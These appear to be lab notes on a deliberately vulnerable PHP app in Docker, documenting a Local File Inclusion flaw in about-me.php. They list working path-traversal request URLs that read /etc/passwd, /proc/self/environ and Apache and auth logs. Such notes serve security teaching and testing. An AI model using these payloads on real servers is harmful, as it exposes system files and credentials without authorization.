In the page About-me.php:

A screenshot of a computer

AI-generated content may be incorrect.

There is Local File Inclusion implemented.

This is the normal api:  
  
<http://localhost:8080/about-me.php?page=about-us.php>

Feel free to try:  
[localhost:8080/about-me.php?page=/etc/passwd](http://localhost:8080/about-me.php?page=/etc/passwd)

To navigate in the server first find out the current folder:  
[localhost:8080/about-me.php?page=include.php](http://localhost:8080/about-me.php?page=include.php)

* Error with the path are printed on the screen!

A screenshot of a computer

AI-generated content may be incorrect.

[localhost:8080/about-me.php?page=/../../../etc/passwd](http://localhost:8080/about-me.php?page=/../../../etc/passwd)

These files do not exist in Docker container (Web Project) – : Permission denied :

I do not know why, but in Docker containers it is not possible to change the permissions:

[localhost:8080/about-me.php?page=/../../../proc/self/environ](http://localhost:8080/about-me.php?page=/../../../proc/self/environ)

Logging functionality does not work in Docker like in a real Linux Server: A computer screen shot of white text

AI-generated content may be incorrect.

[localhost:8080/about-me.php?page=/../../../var/log/apache2/access.log](http://localhost:8080/about-me.php?page=/../../../var/log/apache2/access.log)

[localhost:8080/about-me.php?page=/../../../var/log/auth.log](http://localhost:8080/about-me.php?page=/../../../var/log/auth.log)